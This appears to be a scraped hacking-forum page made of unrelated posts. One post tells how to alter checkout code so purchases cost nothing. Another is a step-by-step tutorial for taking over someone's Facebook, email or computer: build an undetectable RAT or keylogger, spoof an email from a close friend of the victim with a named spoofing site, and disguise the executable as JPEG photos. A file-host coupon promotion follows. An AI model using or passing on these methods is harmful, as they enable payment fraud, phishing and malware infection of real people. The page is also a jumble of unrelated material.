You basically edit the website's code to make the price of the item 0 bucks, or one cent.

No money (or a penny) is actually being sent to the seller so you can see why you're better off legally buying hong kong ass penny auctions off ebay.

Here is a video showing it on PP checkout: http://www.youtube.com/watch?v=SbDAUHT5QdQ

I bet ninja remote above already caught on to this by now if people are actually doing exactly what the above guy did in that video.

Here is a video of it being done on amazon: http://www.youtube.com/watch?v=u5Q_stLGoyc

This exploit is detectable because, like I said, no money is going in from you. Use at your own risk. This can also be used for other sites as well.

Hack Facebook

Hack almost everyone. every FACEBOOK and EMAIL (via facebook) 100% hack

TUTORIAL: Hack anyone Facebook,email or PC....



This tutorial is like a spreading tutorial way basically. But more precise and powerful.

click here to download the hackers kit For free MOSTLY I HAVE HACKED GIRLS WITH THIS METHOD (because they don't get fooled so easily by a poser and other shit. So this thing can do it)Hehe

REQUIREMENTS:-

1) A fully FUD server(SERVER BEING FUD is the most important part of the hack)
2) Patience

That's all...

Now coming to the hack...

there are basically thousands of tutorials in HF about keylogger,RAT,stealer and crypting... so read one and make your server fully fud...

Now do just as what i say:-

1) go to "http://emailattack.host22.com/emailspoof.php" and leave that tab open

2) now login to your facebook and copy the username of the person(FB username) you want to hack

like this....

http://imageshack.us/photo/my-images/543/username.png

so basically the name after the http://www.facebook.com/ is the username...

in my example "RANDOM" is the username....

if the link shows url like "https://www.facebook.com/profile.php?id=100003721756694" then you cannot use this method on them....

3) as you are the friend of the person you must know who he his/her best friend or just close friend....

so basically get his email id attached to his Facebook like

http://imageshack.us/photo/my-images/152/contactw.png

[this can be hard if you don't have this person as your friend]

anyways you can ask his/her email id if you know him....

4)Now just open that spoofer tab and paste the info as follows:-

in Spoofed Email: the id you stolen from the contact info: ex: something@anymail.com

in Targets Email: username@facebook.com, ex: random@facebook.com

in Reply Email: same as spoofed email

in message title: hi or whatever

in message body : Hi check out my new pics uploaded here: "link of your key-logger,rat or whatever"

HE/SHE WILL RECEIVE THAT MESSAGE FROM THE SPOOFED PERSON AND AS HE/SHE IS HER CLOSE FRIEND SHE WILL DEFINITELY DOWNLOAD AND RUN ITYeye

slave WILL TAKE SOME TIME TO READ THE MESSAGE&gt;DOWNLOAD THE FILE&gt;RUN IT. THAT'S WHY I SAID PATIENCE IS A REQUIREMENT Ninja....

PRO-TIP:

1) If you are using the message from the example then i suggest you to download some of the spoofed person(slave friend)

pictures and use icon-changer to change your server icon to JPEG icon and put all that pics and your server to an .rar file and

upload it to the hosting site....

Lol,,,, no one sees the extension if you do this thing..

2) use rat's crew extension spoofer to change the extension to JPEG and change server icon to JPEG too....

Cyber lock

Get FILEBOX.COM Premium Account for FREE
Cyberlocker Switzerland has purchased filebox.com and thus they have launched a new affiliate program for it.

In order, to promote the site they are offering the following for the site:

1. 6 month free premium account

2. 90% payout on all Premium Sales from your files
Use the coupon code

free6mtfb

to get your Premium 6 month account ! So jus go n register with this coupon code..